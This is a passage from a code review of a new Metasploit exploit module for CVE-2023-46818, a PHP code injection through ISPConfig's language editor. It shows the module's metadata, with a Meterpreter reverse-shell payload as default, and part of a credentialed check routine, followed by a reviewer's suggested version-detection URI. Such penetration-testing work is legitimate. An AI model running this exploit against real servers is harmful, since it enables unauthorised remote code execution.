modules/exploits/linux/http/ispconfig_lang_edit_php_code_injection.rb

```diff
@@ -0,0 +1,353 @@
+          setting is enabled, allowing authenticated administrators to inject arbitrary
+          PHP code through the language editor interface.
+          
+          This module will automatically check if the required `admin_allow_langedit`
+          permission is enabled, and attempt to enable it if it's disabled (requires
+          admin credentials with system configuration access).
+          
+          The exploit works by injecting a PHP payload into a language file, which
+          is then executed when the file is accessed. The payload is base64 encoded
+          and written using PHP's file_put_contents function.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'syfi', # Discovery and PoC
+          'Egidio Romano'
+        ],
+        'References' => [
+          ['CVE', '2023-46818'],
+          ['URL', 'https://github.com/SyFi/CVE-2023-46818'],
+          ['URL', 'https://karmainsecurity.com/KIS-2023-13'],
+          ['URL', 'https://karmainsecurity.com/pocs/CVE-2023-46818.php']
+        ],
+        'Platform' => 'php',
+        'Arch' => ARCH_PHP,
+        'Targets' => [
+          [
+            'Automatic PHP',
+            {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP
+            }
+          ]
+        ],
+        'Privileged' => false,
+        'DisclosureDate' => '2023-10-24',
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'PAYLOAD' => 'php/meterpreter/reverse_tcp'
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'The URI path to ISPConfig', '/']),
+      OptString.new('USERNAME', [true, 'ISPConfig administrator username']),
+      OptString.new('PASSWORD', [true, 'ISPConfig administrator password'])
+    ])
+  end
+
+  def check
+    print_status('Checking if the target is ISPConfig...')
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'login')
+    })
+    return CheckCode::Unknown unless res
+
+    # Try to log in and parse version if credentials are provided
+    if datastore['USERNAME'] && datastore['PASSWORD']
+      login_res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'login'),
+        'vars_post' => {
+          'username' => datastore['USERNAME'],
+          'password' => datastore['PASSWORD'],
+          's_mod' => 'login'
+        },
+        'keep_cookies' => true
+      })
+      if login_res && (login_res.headers['Location']&.include?('admin') || login_res.body.downcase.include?('dashboard'))
+        # Try to access the dashboard or settings page
+        settings_res = send_request_cgi({
+          'method' => 'GET',
+          'uri' => normalize_uri(target_uri.path, 'admin', 'index.php'),
```

Comment:
I think I've found another URI for version detection:
```suggestion
          'uri' => normalize_uri(target_uri.path, 'help', 'version.php'),
```